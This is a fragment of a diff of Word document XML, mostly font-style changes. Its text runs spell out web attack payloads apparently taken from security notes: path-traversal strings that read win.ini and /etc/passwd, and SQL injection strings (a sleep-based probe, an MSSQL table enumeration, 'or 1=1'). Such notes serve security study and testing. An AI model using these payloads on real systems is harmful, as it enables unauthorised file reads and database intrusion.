+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>windows</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>win.ini</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/cgi-bin</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/.%</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>injection:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>URL:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:before="0"/>
+        <w:ind w:firstLine="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-GB"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>%2c(select%20*%20from%20(select(sleep(10)</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-GB"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>))a</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-GB"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:before="0"/>
+        <w:ind w:firstLine="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-GB"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:before="0"/>
+        <w:ind w:firstLine="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-GB"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-GB"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-GB"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1 in (select min(name) from sysobjects where xtype = 'U' and name &gt; '.') --</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="pl-c1"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="0550AE"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>/page</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="pl-c1"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="0550AE"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>asp</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>?id</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="pl-k"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>=</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="pl-c1"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="0550AE"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>1</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="pl-k"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>or</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="pl-c1"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="0550AE"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>1</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="pl-k"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>=</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="pl-c1"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="0550AE"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>1</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="pl-c"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="59636E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>-- true</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c1"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0550AE"/>
